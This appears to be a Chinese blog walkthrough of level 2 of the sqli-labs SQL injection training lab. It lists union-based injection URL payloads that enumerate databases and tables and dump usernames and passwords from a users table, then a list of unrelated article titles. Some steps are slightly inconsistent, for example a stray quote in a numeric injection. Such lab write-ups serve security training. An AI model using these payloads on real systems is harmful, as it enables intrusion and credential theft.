sqli-labs系列——第二关
2024-08-28 10:15:23
less2
and 1=1有回显,and 1=2无回显,为数值型注入
order by 4–+报错,有3行
查询数据库名
?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
查询列名
?id=0 union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
查询账号密码
?id=0 union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+
这里因为跟第一关大同小异,字段类型都是一样的,可以直接用exp去爆
exp:?id=-1 union SELECT 1,2,(select group_concat(username,0x3a,password) from users)--+
这里解释一下0x3a的用途:把账号和密码整合到一起更直观的显示
最新文章
- 动画黄金搭档:CADisplayLink &; CAShapeLayer
- ssh authentication魔鬼细节--.ssh文件夹权限
- list用法详解
- POJ3169 Layout(差分约束系统)
- Bucket Sort
- Codeforces#348DIV2/VK CUP 2016
- DeepLearning.ai学习笔记(一)神经网络和深度学习--Week4深层神经网络
- Java多线程——中断机制
- Python爬虫与数据分析之爬虫技能:urlib库、xpath选择器、正则表达式
- keepalived给LVS带来了什么
- RunLoop 原理和核心机制
- python 迭代器模式
- 禁用win7更新
- HR 常用事务代码
- C和指针第七章第五题
- java switch
- ACM-线段树扫描线总结
- NOIP2003 神经网络(bfs)
- Linux网络编程——tcp并发服务器(poll实现)
- TortoiseGit 连接oschina不用每次输入username和password的方法
热门文章
- Spring配置声明式事务
- 如何用 js 实现一个 apply 函数
- ES6 &; import * &; import default &; import JSON
- 开始 nx
- js字典
- Masterboxan INC :个股出现疯涨,投资者需警惕股市泡沫
- css整理之-----------布局相关
- Github Packages和Github Actions实践之CI/CD
- 修改vs模板抬头\Common7\IDE\ItemTemplates\CSharp\Code\2052\Class
- The last packet successfully received from the server was 49,061,696 millise